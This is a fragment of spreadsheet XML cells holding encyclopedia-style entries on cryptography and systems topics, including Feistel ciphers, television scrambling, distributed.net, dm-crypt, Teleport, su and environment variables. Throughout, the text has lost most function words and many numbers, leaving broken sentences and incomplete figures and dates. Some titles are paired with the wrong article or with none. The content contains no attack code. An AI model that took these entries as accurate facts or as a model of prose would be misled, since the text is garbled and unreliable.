  </si>
  <si>
    <t>cryptography, feistel cipher (also known luby–rackoff block cipher) symmetric structure used construction block ciphers, named german-born physicist cryptographer horst feistel, pioneering research working ibm; also commonly known feistel network. large proportion block ciphers scheme, including data encryption standard, soviet/russian gost recent blowfish twofish ciphers. feistel cipher, encryption decryption similar operations, consist iteratively running function called "round function" fixed number times. history many modern symmetric block ciphers based feistel networks. feistel networks first seen commercially ibm's lucifer cipher, designed horst feistel coppersmith 1973. feistel networks gained respectability u.s. federal government adopted cipher based lucifer, changes made nsa) 1976. like components des, iterative nature feistel construction makes implementing cryptosystem hardware easier (particularly hardware available time des's design). design feistel network uses round function, function takes inputs data block subkey returns output size data block. round, round function half data encrypted, output xored half data. this repeated fixed number times, final output encrypted data. important advantage feistel networks compared cipher designs substitution–permutation networks entire operation guaranteed invertible (that encrypted data decrypted), even round function invertible. round function made arbitrarily complicated, since need designed invertible.: furthermore, encryption decryption operations similar, even identical cases, requiring reversal schedule. therefore, size code circuitry required implement cipher nearly halved. theoretical work structure properties feistel ciphers extensively analyzed cryptographers. michael luby charles rackoff analyzed feistel cipher construction proved round function cryptographically secure pseudorandom function, used seed, rounds sufficient make block cipher pseudorandom permutation, rounds sufficient make "strong" pseudorandom permutation (which means remains pseudorandom even adversary gets oracle access inverse permutation). because important result luby rackoff, feistel ciphers sometimes called luby–rackoff block ciphers. further theoretical work generalized construction somewhat given precise bounds security. construction details {\displaystyle \mathrm round function {\displaystyle k_{0},k_{1},\ldots ,k_{n}} sub-keys rounds {\displaystyle 0,1,\ldots respectively. then basic operation follows: split plaintext block equal pieces: {\displaystyle l_{0}} {\displaystyle r_{0}} round {\displaystyle i=0,1,\dots compute {\displaystyle l_{i+1}=r_{i},} {\displaystyle r_{i+1}=l_{i}\oplus \mathrm (r_{i},k_{i}),} {\displaystyle \oplus means xor. then ciphertext {\displaystyle (r_{n+1},l_{n+1})} decryption ciphertext {\displaystyle (r_{n+1},l_{n+1})} accomplished computing {\displaystyle i=n,n-1,\ldots {\displaystyle r_{i}=l_{i+1},} {\displaystyle l_{i}=r_{i+1}\oplus \operatorname (l_{i+1},k_{i}).} then {\displaystyle (l_{0},r_{0})} plaintext again. diagram illustrates encryption decryption. note reversal subkey order decryption; difference encryption decryption. unbalanced feistel cipher unbalanced feistel ciphers modified structure {\displaystyle l_{0}} {\displaystyle r_{0}} equal lengths. skipjack cipher example cipher. texas instruments digital signature transponder uses proprietary unbalanced feistel cipher perform challenge–response authentication.the thorp shuffle extreme case unbalanced feistel cipher side single bit. this better provable security balanced feistel cipher requires rounds. other uses feistel construction also used cryptographic algorithms block ciphers. example, optimal asymmetric encryption padding (oaep) scheme uses simple feistel network randomize ciphertexts certain asymmetric-key encryption schemes. generalized feistel algorithm used create strong permutations small domains size power (see format-preserving encryption). feistel networks design component whether entire cipher feistel cipher not, feistel-like networks used component cipher's design. example, misty1 feistel cipher using three-round feistel network round function, skipjack modified feistel cipher using feistel network permutation, threefish (part skein) non-feistel block cipher uses feistel-like function. list feistel ciphers feistel modified feistel: generalised feistel: cast-256 clefia macguffin skipjack sms4 also cryptography stream cipher substitution–permutation network lifting scheme discrete wavelet transform pretty much structure format-preserving encryption lai–massey scheme references</t>
  </si>
  <si>
    <t>Federated Naming Service</t>
  </si>
  <si>
    <t>computing, federated naming service (fns) (x/open federated naming) system uniting various name services single interface basic naming operations. produced x/open included various unix operating systems, primarily solaris versions purpose allow applications widely heterogeneous naming services (such nis, single interface, avoid duplication programming effort. unlike similar ldap, neither ever popular widely used. last included solaris included solaris external links references overview (solaris page) overview interface (solaris page) x/open federated naming specification uniform naming interfaces multiple naming systems (elizabeth martin, hewlett-packard journal, december 1995) federated naming service programming guide (sun microsystems 816–1470–10, september 2002)</t>
  </si>
  <si>
    <t>Federal Desktop Core Configuration</t>
  </si>
  <si>
    <t>federal desktop core configuration list security settings recommended national institute standards technology general-purpose microcomputers connected directly network united states government agency. fdcc list agreed upon microsoft windows operating system common core system functions, applications, files, services changed configuration around framework secure, security-reliable windows operating system created. standards made mandatory every federal government computer effective 2008. wanted connect federal office computer network system meet exceed fdcc standard denied access. fdcc applied windows vista desktop laptop computers replaced united states government configuration baseline (usgcb), included settings windows enterprise linux windows nist changed naming convention government computer baseline (usgcb 2.0). addition un-classifying general windows settings guide, nist also publishes guides specifically windows firewall, internet explorer, guide (vista-energy, example) created capture settings adhere energy conservation policies. history march 2007, office management budget issued memorandum instructing united states government agencies develop plans using microsoft windows vista security configurations. united states force common security configurations windows proposed early model standards could developed.the fdcc baseline developed (and maintained) national institute standards technology collaboration omb, dhs, doi, disa, nsa, usaf microsoft, input public comment. applies windows professional vista systems only—these security policies tested (and according nist, work) windows 9x/me/nt/2000 windows server 2003.major version (released october 2008) changed settings, expanded scap reporting options. previous versions, standard applicable general-purpose workstations laptops users. windows vista systems servers exempt standard. also exempt embedded computers "special purpose" systems (defined specialized scientific, medical, process control, experimental systems), though nist still recommends fdcc security configuration considered "where feasible appropriate".the fdcc settings, generally speaking, block open connections operating systems, disables functions, disables rarely used applications soho environment, disables unnecessary services, changes permissions items, changes files collected recorded, affects group policy object (gpo) settings, alters entries windows system registry. infoweek introduced fdcc mostly administrators engineers article titled ‘the feds don’t allow should you?’ written kelly jackson higgins darkreading.com published february 2008. complexity guidelines response initially slow. implementation took time settings internally researched government enterprise implementation techs. nist published guidelines hundreds-of-page texts introduced called scap files applications. (see wikipedia scap page) windows platform built easy interoperability networking therefore left opportunities within operating systems types auto- semi-automatic connections computers. these weren’t flaws programming mistakes, purposefully built way. example found looking windows remote connection program enabled default typical windows operating system installation. fdcc/usgcb configuration, instance, reverses setting manually re-enable allow remote connections. requirements organizations required document fdcc compliance using scap tools. there 600+ settings average fdcc/usgcb document usable average small home office (soho) computer. instance, released june 2008, fdcc major version specifies settings. example, "all wireless interfaces disabled". recognition recommended settings practical every system, exceptions (such "authorized enterprise wireless networks") made documented fdcc deviation report.strict implementation recommended settings known cause usability issues. nist publishes list known issues found (https://usgcb.nist.gov/usgcb/microsoft_content.html). there third-party software vendors emerged claim tested settings soho environment however, time, general public still remains relatively unaware fdcc usgcb security settings developed forward nist. external links "u.s. government configuration baseline solution". microsoft corporation. retrieved june 2010. references</t>
  </si>
  <si>
    <t>Fault tolerance</t>
  </si>
  <si>
    <t>Fault (technology)</t>
  </si>
  <si>
    <t>document 10303-226, fault defined abnormal condition defect component, equipment, sub-system level lead failure. telecommunications, according federal standard 1037c united states, term fault following meanings: accidental condition causes functional unit fail perform required function. random fault. defect causes reproducible catastrophic malfunction. malfunction considered reproducible occurs consistently circumstances. systematic fault. power systems, unintentional short circuit, partial short circuit, energized conductors energized conductor ground. distinction made symmetric asymmetric faults. fault (power engineering). random fault random fault fault occurs result wear deterioration. whereas time particular occurrence fault cannot determined, rate faults occur within equipment population average predicted accuracy. manufacturers often accept random faults risk chances virtually negligible. fault happen virtually object appliance, common electronics machinery. example, xbox console deteriorate time dust buildup fans. this cause xbox overheat, cause error, shut console down. systematic fault systematic faults often result error specification equipment therefore affect examples type. such faults remain undetected years, conditions conduce create failure. given circumstances, every example equipment would fail identically time. failures hardware caused random faults systematic faults, failures software always systematic. also product defect reliability engineering software defect (disambiguation) fault (disambiguation)</t>
  </si>
  <si>
    <t>Television encryption</t>
  </si>
  <si>
    <t>television encryption, often referred scrambling, encryption used control access television services, usually cable, satellite, internet protocol television (iptv) services. history television exists make revenue subscribers, sometimes subscribers pay. prevention piracy cable satellite networks main factors development encryption systems. early cable-based networks used security. this problems people connecting network without paying. consequently, methods developed frustrate self-connectors. early systems cable television based number simple measures. common channel-based filter would effectively stop channel received subscribed. these filters would added removed according subscription. number television channels cable networks grew, filter-based approach became increasingly impractical. other techniques adding interfering signal video audio began used simple filter solutions easily bypassed. technology evolved, addressable set-top boxes became common, complex scrambling techniques digital encryption audio video rotate (where line video particular point parts reordered around point) applied signals. encryption used protect satellite-distributed feeds cable television networks. some systems used cable feed distribution expensive. market grew, less secure systems began used. many systems (such orion) variants cable television scrambling systems affected synchronisation part video, inverted video signal, added interfering frequency video. analogue scrambling techniques easily defeated. france, canal+ launched scrambled service 1984. also claimed unbreakable system. unfortunately company, electronics magazine, "radio plans", published design pirate decoder within month channel launching. first services encrypt signal using videocipher system. europe, filmnet scrambled satellite service september 1986, thus creating biggest markets pirate satellite decoders world, system filmnet used easily hacked. filmnet's main attractions would screen hard-core porn films various nights week. videocipher system proved somewhat difficult hack, eventually fell prey pirates. conditional access cable early satellite television encryption analog digital television several conditional access systems used pay-per-view (ppv) subscriber related services. originally, analog-only cable television systems relied set-top boxes control access programming, television sets originally "cable-ready". analog encryption typically limited premium channels channels adult-oriented content. cases, various proprietary video synchronization suppression methods used control access programming. systems, necessary sync signal separate subcarrier though sometimes sync polarity simply inverted, case, used conjunction pal, secam cable tuner used partially descramble signal though black white inverted luminance thus multi standard supports preferred decode color well. this, however lead part video signal received audio well thus another preferably auto mute used audio decoding. analog set-top boxes largely replaced digital set-top boxes directly control access programming well digitally decrypt signals. although several analog encryption types tested early 1980s, videocipher became facto analog encryption standard c-band satellite channels used. early adopters vcii cinemax, encrypting full time beginning january 1986; showtime movie channel beginning 1986; headline news, july year. videocipher replaced standard vcii+ early 1990s, turn replaced vcii+ vcii-capable satellite receiver required decode vcii channels. vcii largely replaced digicipher north america. originally, vcii-based receivers separate modem technology pay-per-view access known videopal. this technology became fully integrated later-generation analog satellite television receivers. videocipher (deprecated) videocipher (deprecated) videocipher videocipher (renewable security) digital cable satellite television encryption digicipher general instrument's proprietary video distribution system. digicipher based upon mpeg-2. 4dtv satellite receiver required decode digicipher channels. north america, digital cable programming accessed digicipher 2-based set-top boxes. digicipher also referred dcii. powervu another popular digital encryption technology used non-residential usage. powervu developed scientific atlanta. other commercial digital encryption systems are, nagravision kudelski), viaccess france telecom), wegener. directv dish network direct-broadcast satellite systems digital encryption standards controlling access programming. directv uses videoguard, system designed nds. directv cracked past, abundance cracked smartcards available black market. however, switch stronger form smart card (the card) wiped directtv piracy soon introduced. since then, public cracks become available. dish network uses nagravision encryption. now-defunct voom primestar services used general instruments/motorola equipment, thus used digicipher 2-based system similar earlier 4dtv large dish satellite systems. canada, bell satellite shaw direct systems digital encryption standards. bell like dish network, uses nagravision encryption. shaw direct, meanwhile, uses digicipher 2-based system, equipment also sourced general instruments/motorola. older television encryption systems zenith phonevision zenith electronics developed encryption scheme phonevision system 1950s 1960s. orion orion originally used analog satellite television channel access canada. innovative time used digital audio. completely replaced digital encryption technologies. orion used channel europe years 1982 1987, m-net south africa 1986 2018. developed related encryption systems cable broadcast services ontv. leitch technology leitch viewguard analog encryption standard used primarily broadcast networks north america. method scrambling re-ordering lines video (line shuffle), leaves audio intact. terrestrial broadcast catv systems northern canada used conditional access system many years. occasionally used today satellite circuits similarity d2-mac b-mac. there also version encrypted audio using digital audio stream horizontal blanking interval like vcii system. network used affiliate feeds would turn analog carriers satellite feed. b-mac b-mac used applications since primestar switched all-digital delivery system mid-1990s. videocrypt videocrypt analogue rotate scrambling system smartcard based conditional access system. used 1990s several european satellite broadcasters, mainly british broadcasting. also used zealand (sky-nz). version videocrypt (videocrypt-s) capability scrambling sound. soft encryption option also available encrypted video could transmitted fixed videocrypt decoder could decode ritc discret ritc discret system based horizontal video line delay audio scrambling. start point line video pseudorandomly delayed either 1804 first used 1984 french channel canal plus, widely compromised december 1984 issue "radio plans" magazine printed decoder plans. also used discret system late 1980s, part testing off-air hours encrypted specialist programming, bmtv (british medical television) broadcast two. this would ultimately lead launch scrambled select service early 1990s. satpac used european channel filmnet, satpac interfered horizontal vertical synchronisation signals transmitted signal containing synchronisation authorisation data separate subcarrier. system first used september 1986 many upgrades easily compromised pirates. september 1992, filmnet changed d2-mac eurocrypt. telease maast sat-tel save added interfering sine wave frequency circa 93.750 video signal. this interfering signal approximately times frequency horizontal refresh. optional sound scrambling using spectrum inversion. used world service broadcasts defunct movie channel "premiere". payview used german/swiss channel teleclub early 1990s, system employed various methods video inversion, modification synchronisation signals, pseudo line delay effect. d2-mac eurocrypt conditional access system using d2-mac standard. developed mainly france telecom, system smartcard based. encryption algorithm smartcard based des. first smart card based systems compromised. nagravision analogue system older nagravision system scrambling analogue satellite terrestrial television programs used 1990s, example german pay-tv broadcaster premiere. line-shuffling system, lines signal temporarily stored encoder decoder read permuted order control pseudorandom number generator. smartcard security microcontroller key-shaped package) decrypts data transmitted blanking intervals signal extracts random seed value needed controlling random number generation. system also permitted audio signal scrambled inverting spectrum 12.8 using frequency mixer. also conditional access pirate decryption references external links rec.video.satellite.tvro</t>
  </si>
  <si>
    <t>Distributed.net</t>
  </si>
  <si>
    <t>distributed.net distributed computing effort attempting solve large scale problems using otherwise idle time. governed distributed computing technologies, incorporated (dcti), non-profit organization u.s. code 501(c)(3). distributed.net working rc5-72 (breaking 72-bit key), ogr-28 (searching optimal 28-mark golomb ruler). rc5-72 project pace exhaust keyspace years, although project whenever required found. both problems part series: part infinite series; eight unsolved challenges security, although 2007, security announced would longer providing prize money correct secret challenges. distributed.net decided sponsor original prize offer finding result.in 2001, distributed.net estimated throughput tflops. august 2019, throughput estimated cray xc40, used lonestar supercomputer, around 1.25 petaflops. history coordinated effort started february 1997 earle christopher stach hotjobs.com media labs, effort break rc5-56 portion secret-key challenge, 56-bit encryption algorithm $10,000 prize available anyone could find key. unfortunately, initial effort suspended result flood attacks participants upon server.a independent effort, named distributed.net, coordinated jeffrey lawson, adam beberg, david mcnett along several others would serve board operate infrastructure. late march 1997 proxies released resume rc5-56 work began enhanced clients. head selected icon application project's mascot.the rc5-56 challenge solved october 1997 days. correct "0x532b744cc20999" plaintext message read "the unknown message it's time move longer length".the rc5-64 challenge solved july 2002 1,757 days. correct "0x63de7dc154f4d039" plaintext message read "the unknown message some things better left unread".the search ogrs order completed distributed.net october 2004, october 2008, february 2009, february 2014 respectively. client "dnetc" file name software application users participate active distributed.net project. command line program interface configure available wide variety platforms. distributed.net refers software application simply "client". april 2019, volunteers running 32-bit windows ati/amd stream enabled gpus contributed processing power rc5-72 project volunteers running 64-bit linux contributed processing power ogr-28 project.portions source code client publicly available, although users permitted distribute modified versions themselves.distributed.net's rc5-72 ogr-28 projects available boinc client moo! wrapper yoyo@home projects respectively. development gpu-enabled clients recent years, work rc5-72 project submitted clients modern graphics cards. although project already underway almost years first gpus began submitting results, march 2018, gpus represent completed work units, complete nearly work units day. nvidiain late 2007, work began implementation rc5-72 cores designed nvidia cuda-enabled hardware, first completed work units reported november 2008. high-end nvidia video cards time, upwards million keys/second observed comparison, 2008-era high-end single working rc5-72 achieved million keys/second, representing significant advancement rc5-72. january 2020, cuda clients completed roughly work rc5-72 project.atisimilarly, near 2008, work began implementation rc5-72 cores designed stream-enabled hardware. some products radeon 5000 6000 series provided rates excess billion keys/second. january 2020, stream clients completed roughly work rc5-72 project.openclan opencl client entered beta testing late 2012 released 2013. january 2020, opencl clients completed work rc5-72 project. breakdown opencl production manufacturer exists, amd, nvidia, intel gpus support opencl. timeline distributed.net projects currentrsa lab's 72-bit encryption challenge progress, 8.674% complete 2022 (although labs discontinued sponsorship) optimal golomb rulers (ogr-28) progress, ~95.59% complete 2022cryptographyrsa lab's 56-bit encryption challenge completed october 1997 (after days space tested). lab's 56-bit des-ii-1 encryption challenge completed february 1998 (after days) lab's 56-bit des-ii-2 encryption challenge ended july 1998 (found independently cracker days) lab's 56-bit des-iii encryption challenge completed january 1999 (after 22.5 hours help cracker) cs-cipher challenge completed january 2000 (after days space tested). lab's 64-bit encryption challenge completed july 2002 (after 1726 days space tested).golomb rulersoptimal golomb rulers (ogr-24) completed october 2004 (after 1552 days, confirmed predicted best ruler) optimal golomb rulers (ogr-25) completed october 2008 (after 3006 days, confirmed predicted best ruler) optimal golomb rulers (ogr-26) completed february 2009 (after days, confirmed predicted best ruler) optimal golomb rulers (ogr-27) completed february 2014 (after 1822 days, confirmed predicted best ruler) also secret-key challenge golomb ruler challenges brute force attack cryptanalysis size list distributed computing projects berkeley open infrastructure network computing references external links official website</t>
  </si>
  <si>
    <t>Dm-crypt</t>
  </si>
  <si>
    <t>dm-crypt transparent block device encryption subsystem linux kernel versions later dragonfly bsd. part device mapper (dm) infrastructure, uses cryptographic routines kernel's crypto api. unlike predecessor cryptoloop, dm-crypt designed support advanced modes operation, xts, essiv (see disk encryption theory information), order avoid watermarking attacks. addition that, dm-crypt addresses reliability problems cryptoloop.dm-crypt implemented device mapper target stacked device mapper transformations. thus encrypt whole disks (including removable media), partitions, software raid volumes, logical volumes, well files. appears block device, used back file systems, swap physical volume. some linux distributions support dm-crypt root file system. these distributions initrd prompt user enter passphrase console, insert smart card prior normal boot process. frontends dm-crypt device mapper target resides entirely kernel space, concerned encryption block device interpret data itself. relies user space front-ends create activate encrypted volumes, manage authentication. least frontends currently available: cryptsetup cryptmount. cryptsetup cryptsetup command-line interface, default, write headers encrypted volume, hence provides bare essentials: encryption settings provided every time disk mounted (although usually employed automated scripts), used volume; symmetric encryption directly derived supplied passphrase. because lacks "salt", using cryptsetup less secure mode case linux unified setup (luks). however, simplicity cryptsetup makes useful combined third-party software, example, smart card authentication. cryptsetup also provides commands deal luks on-disk format. this format provides additional features management stretching (using pbkdf2), remembers encrypted volume configuration across reboots. cryptmount cryptmount interface alternative "cryptsetup" tool allows user mount unmount dm-crypt file system needed, without needing superuser privileges device configured superuser. features fact disk encryption (volume encryption) software like dm-crypt deals transparent encryption abstract block devices gives flexibility. this means used encrypting disk-backed file systems supported operating system, well swap space; write barriers implemented file systems preserved. encrypted volumes stored disk partitions, logical volumes, whole disks well file-backed disk images (through loop devices losetup utility). dm-crypt also configured encrypt raid volumes physical volumes. dm-crypt also configured provide pre-boot authentication initrd, thus encrypting data computer except bootloader, kernel initrd image itself.when using cipher block chaining mode operation predictable initialization vectors disk encryption software, disk vulnerable watermarking attacks. this means attacker able detect presence specially crafted data disk. address problem predecessors, dm-crypt included provisions elaborate, disk encryption-specific modes operation. support essiv (encrypted salt-sector initialization vector) introduced linux kernel version 2.6.10, 2.6.20 2.6.24. linux crypto includes support popular block ciphers hash functions, usable dm-crypt. crypted support include luks volumes, loop-aes since linux kernel 3.13, truecrypt target called "tcw". compatibility dm-crypt luks encrypted disks accessed used windows using defunct freeotfe (formerly doxbox, librecrypt), provided filesystem used supported windows (e.g. fat/fat32/ntfs). encrypted ext2 ext3 filesystems supported using ext2fsd so-called "ext2 installable file system windows"; freeotfe also supports them. cryptsetup/luks required infrastructure also implemented dragonfly operating system. also comparison disk encryption software references external links official dm-crypt, cryptsetup-luks cryptmount websites dm-crypt luks page archive.org) page covering dm-crypt/luks, starting theory ending many practical examples usage.</t>
  </si>
  <si>
    <t>Teleport (open-source software)</t>
  </si>
  <si>
    <t>teleport open-source tool providing zero trust access servers cloud applications using ssh, kubernetes https. eliminate need vpns providing single gateway access computing infrastructure ssh, kubernetes clusters, cloud applications built-in proxy.teleport started open source library used gravity project enable secure software deployments restricted regulated environments. teleport open sourced standalone tool gravitational inc. 2016. currently deployed production samsung, nasdaq, ibm, ticketmaster, epic games others. publicly audited technology security companies like cure doyensec.alternatives teleport include bastion host strongdm. history teleport built gravitational inc, company specializes kubernetes-based application deployment compliance. security gateway protocol became teleport originated within remote application management platform also built gravitational, called gravity. gravitational member 2015 combinator cohort, teleport originally released june 2016.teleport released october 2018 introduced kubernetes integration. version released 2019 included support infrastructure products.the open-source version teleport known teleport community available download github. gravitational also offers commercial version teleport (teleport enterprise) includes features like role-based access control (rbac). features teleport provides following features, detailed github: access proxy teleport proxy provides https access servers, applications, kubernetes clusters across multiple data centers, cloud providers, edge devices. teleport proxy identity-aware, i.e. allows certificate-based authentication integrating identity manager github, google apps, okta active directory, others. audit teleport collects system events across servers installed stores audit compliance purposes. auditable events include authentication attempts, file transfers, network connections, file system changes made session. audit stored encrypted file system, amazon dynamodb cloud data stores. session recording teleport records interactive user sessions kubernetes protocols stores audit log. stored sessions replayed built-in session player. access servers running teleport accessed clients regardless physical location, even using cellular connection. dynamic authorization teleport users request one-time elevation permissions complete privileged task. such requests approved denied chat tools slack, mattermost, custom workflow, implemented teleport api. teleport proxy offers web-based client configuration, accessing servers kubernetes accessing audit log. teleport requires least virtual memory built compiled. architecture teleport written programming language, runs unix-compatible operating systems, including linux, macos, several variants. teleport consists executables: (command line client) teleport (server daemon). teleport server daemon following modes: node. mode, daemon providing kubernetes access server running proxy. mode, daemon acting identity-aware proxy protocols supported teleport. currently, includes ssh, https, kubernetes api. auth server. mode, daemon acting certificate authority daemons must authenticate with. auth server issuing certificates users servers stores audit log. references</t>
  </si>
  <si>
    <t>Template:Crypto-stub</t>
  </si>
  <si>
    <t>pages template automatically included category:cryptography stubs.</t>
  </si>
  <si>
    <t>Structured encryption</t>
  </si>
  <si>
    <t>structured encryption (ste) form encryption encrypts data structure privately queried. structured encryption used building block design end-to-end encrypted databases, efficient searchable symmetric encryption (sse) algorithms efficiently executed encrypted data. description structured encryption scheme symmetric-key encryption scheme encrypts data structure that, given {\displaystyle query {\displaystyle generate query token {\displaystyle qtk} encrypted data structure queried. scheme dynamic also supports update operations like inserts deletes. there several forms including response-revealing response query output plaintext response-hiding response query output encrypted form. schemes guarantee information data queries recovered encrypted data structure tokens beyond well-specified "reasonable" leakage profile. schemes variety leakage profiles designed wide array abstract data types data structures including arrays, multi-maps, dictionaries graphs.ste closely related different searchable symmetric encryption. purpose encrypt document collections keyword search still executed encrypted documents whereas purpose encrypt data structures queries still executed encrypted structure. certain types schemes like multi-map encryption schemes used design sub-linear optimal schemes. references</t>
  </si>
  <si>
    <t>TCP Stealth</t>
  </si>
  <si>
    <t>computer networking, stealth proposed modification transmission control protocol (tcp) hide open ports services public, order impede port scans. somewhat similar port knocking technique. 2015 ietf internet draft specification.the proposal modifies three-way handshake accepting connections clients transmit proof knowledge shared secret. connection attempt stealth, authentication fails, server acts service listening port number.the project initial internet draft specification announced august 2014, following revelations gchq project hacienda, uses port scanning find vulnerable systems five eyes intelligence agencies. draft written researchers technische universität münchen, jacob appelbaum project holger kenn microsoft. references external links knock patches adding stealth linux freebsd kernels various applications master's thesis stealth</t>
  </si>
  <si>
    <t>Su (Unix)</t>
  </si>
  <si>
    <t>unix command stands 'substitute user' historically 'superuser'), used computer user execute commands privileges another user account. when executed invokes shell without changing current working directory user environment. when command used without specifying user command line argument, defaults using superuser account (user system. history command including unix permissions system setuid system call, part version unix. encrypted passwords appeared version command available separate package microsoft windows part unxutils collection native win32 ports common unix-like utilities.the command removed coreutils release 8.18 (2012-08-12) currently included util-linux package. usage when command line, asks target user's password, authenticated, grants operator access account files directories account permitted access. when used hyphen used start login shell. mode users assume user environment target user. command sudo related, executes command another user observes constraints users execute commands users (generally configuration file named /etc/sudoers, best editable command visudo). unlike sudo authenticates users password rather target user allow delegation specific commands specific users specific hosts without sharing passwords among mitigating risk unattended terminals). some unix-like systems implement user group wheel, allow members become root this mitigate security concerns, since intruder might first simply break accounts. however, support group wheel philosophical reasons. richard stallman argues group would prevent users utilizing root passwords leaked them, group would allow existing admins ride roughshod ordinary users. also unix security list unix commands comparison privilege authorization features further reading "from novice master, back again". d-mac's stuff. 2013-01-14. retrieved 2022-08-10. references external links manual pages coreutils. su(1) linux user commands manual su(1) freebsd general commands manual su(1m) solaris system administration commands reference manual command linux information project (linfo) (archived october 2021 wayback machine)</t>
  </si>
  <si>
    <t>FLASK</t>
  </si>
  <si>
    <t>flux advanced security kernel (flask) operating system security architecture provides flexible support security policies. joint venture national security agency, university utah, secure computing corporation project designed provide framework secure operating system. development implementation started mach microkernel, since shifted focus linux operating system. flask core framework security-focused operating systems nsa's security-enhanced linux (selinux), opensolaris fmac trustedbsd. this means selinux thought implementation flask. references external links univ utah flask site selinux trustedbsd opensolaris project: flexible mandatory access control flask: flux advanced security kernel gfac: similar framework concept implemented rsbac</t>
  </si>
  <si>
    <t>FBP USER (environment variable)</t>
  </si>
  <si>
    <t>environment variable dynamic-named value affect running processes behave computer. they part environment process runs. example, running process query value temp environment variable discover suitable location store temporary files, home userprofile variable find directory structure owned user running process. they introduced modern form 1979 version unix, included unix operating system flavors variants point onward including linux macos. from 1982, succeeding microsoft operating systems, including microsoft windows, os/2 also included feature, although somewhat different syntax, usage standard variable names. design unix unix-like systems, well windows, process separate environment variables. default, process created, inherits duplicate run-time environment parent process, except explicit changes made parent creates child. level, changes must done running fork exec. alternatively, command shells bash, user change environment variables particular command invocation indirectly invoking using environment_variable=value &lt;command&gt; notation. running program access values environment variables configuration purposes. shell scripts batch files environment variables communicate data preferences child processes. they also used store temporary values reference later shell script. however, unix, non-exported variables preferred leak outside process. unix, environment variable changed script compiled program affect process possibly child processes. parent process unrelated processes affected. similarly, changing removing variable's value inside windows batch file change variable duration command.comor cmd.exe's existence, respectively. unix, environment variables normally initialized system startup system init startup scripts, hence inherited processes system. users can, often augment profile script command shell using. microsoft windows, environment variable's default value stored windows registry autoexec.bat file. unix, setuid program given environment chosen caller, runs different authority caller. dynamic linker usually load code locations specified environment variables $ld_library_path $ld_preload process's authority. setuid program this, would insecure, caller could arbitrary code hence misuse authority. reason, libc unsets environment variables startup setuid process. setuid programs usually unset unknown environment variables check others reasonable values. general, collection environment variables function associative array keys values strings. interpretation characters either string differs among systems. when data structures lists need represented, common colon (common unix unix-like) semicolon-deliminated (common windows dos) list. syntax variables used scripts command line. they usually referenced putting special symbols front around variable name. conventional environment variable names chosen upper case. programming code generally, helps distinguish environment variables kinds names code. unix-like operating systems, environment variable names case sensitive, dos, os/2, windows. unix unix unix-like command-line shells, environment variable's value retrieved placing sign variable's name. necessary, name also surrounded braces. display user home directory, user type: needed appended value home variable, might type: unix unix-like systems, names environment variables case-sensitive. command displays environment variables values. command printenv also used print single variable giving variable name sole argument command. dos, os/2 windows dos, os/2 windows command-line interpreters command.com cmd.exe, environment variable retrieved placing sign dos, os/2 windows command-line interpreters well api, upper lower case distinguished environment variable names. environment variable named homedrive contains drive letter (plus trailing colon) user's home directory, whilst homepath contains full path user's home directory within drive. home drive path, user type this: command (with arguments) displays environment variables values. also used print variables whose name begins given prefix giving prefix sole argument command. windows powershell, user type this: using powershell's native command name equivalent echo: powershell, upper lower case distinguished environment variable names. following command displays environment variables values: assignment: unix commands used environment variables often incorporated directly shell. following commands also used, often dependent certain shell. variable=value export variable bourne related shells export variable=value ksh, bash, related shells setenv variable value related shells simple principles govern environment variables achieve effect. environment variables local process set. shell processes spawned value environment variable changed one, change seen other. when child process created, inherits environment variables values parent process. usually, program calls another program, first creates child process forking, child adjusts environment needed lastly child replaces program called. this procedure gives calling program control environment called program. unix shells, variables assigned without export keyword. variables defined displayed command, true environment variables, stored shell unknown processes. printenv command display them, child processes inherit them. variable=value prefix syntax exports "true" environment variable child process without affecting current process: variable=value program_name [arguments] persistence environment variable session-wide system-wide. unset builtin command implemented bourne shell family (sh, ksh, bash, etc.) shell family (csh, tcsh, etc.) unix command line shells. unsets shell variable, removing memory shell's exported environment. implemented shell builtin, directly manipulates internals shell. read-only shell variables cannot unset. tries unset read-only variable, unset command print error message return non-zero exit code. assignment: dos, os/2 windows dos, os/2 windows command-line interpreters command.com cmd.exe, command used assign environment variables values using following arguments: variable=value environment variable removed via: variable= command without arguments displays environment variables along values; spaces" shows internal ones too. cmd.exe, possible assign local variables leak outside using setlocal command. powershell, assignment follows syntax similar unix: $env:variable "value" examples examples environment variables include: path: list directory paths. when user types command without providing full path, list checked whether contains path leads command. home (unix-like) userprofile (microsoft windows): indicate user's home directory located file system. home/{.appname} (unix-like) appdata\{developername\appname} (microsoft windows): storing application settings. many applications incorrectly userprofile application settings windows: userprofile used dialogs allow user choose paths like documents/pictures/downloads/music; programmatic purposes, appdata (for roaming application settings shared across multiple devices), localappdata (for local application settings) programdata (for application settings shared multiple users) used. term (unix-like): specifies type computer terminal terminal emulator used (e.g., vt100 dumb). (unix-like): specifies prompt displayed bourne shell variants. mail (unix-like): used indicate user's mail found. temp: location processes store temporary files. true environment variables unix $path contains colon-separated list directories shell searches commands contain slash name (commands slashes interpreted file names execute, shell attempts execute files directly). equivalent dos, os/2 windows %path% variable.$home contains location user's home directory. although current user's home directory also found c-functions getpwuid getuid, $home often used convenience various shell scripts (and contexts). using environment variable also gives user possibility point another directory.$pwd this variable points current directory. equivalent output command called without arguments.$display contains identifier display programs default.$ld_library_path many unix systems dynamic linker, contains colon-separated list directories dynamic linker search shared objects building process image exec, searching directories.$libpath $shlib_path alternatives $ld_library_path typically used older unix versions.$lang, $lc_all, $lc_... $lang used default locale. example, locale values pt_br, language (brazilian) portuguese brazilian practice used relevant. different aspects localization controlled individual $lc_-variables ($lc_ctype, $lc_collate, $lc_date etc.). $lc_all used force locale aspects.$tz refers time zone. several formats, either specifying time zone referencing file /usr/share/zoneinfo).$browser contains colon-separated list user's browser preferences, programs need allow user view content url. browsers list intended attempted first last, stopping first succeeds. this arrangement allows fallback behavior different environments, e.g., environment, graphical browser (such firefox) used, console environment terminal-base browser (such lynx) used. token present specify placed; otherwise browser launched first argument. under dos, master environment provided primary command processor, inherits pre-environment defined config.sys first loaded. size configured command /e:n parameter 32767 bytes. local environment segments inherited child processes typically reduced size contents hold. some command-line processors (like 4dos) allow define minimum amount free environment space available launching secondary shells. while content environment variables remains unchanged upon storage, names (without "%") always converted uppercase, exception pre-environment variables defined config.sys directive higher (and switches=/l (for "allow lowercase names") dr-dos 7.02 higher). principle, ms-dos higher also supports lowercase variable names (%windir%), provides means user define them. environment variable names containing lowercase letters stored environment like normal environment variables, remain invisible software, since written expect uppercase variables only. some command processors limit maximum length variable name characters. while principally limited size environment segment, 16-bit windows programs expect contents environment variables exceed characters. dr-dos command.com supports environment variables 255, 4dos even characters. since command.com configured (via 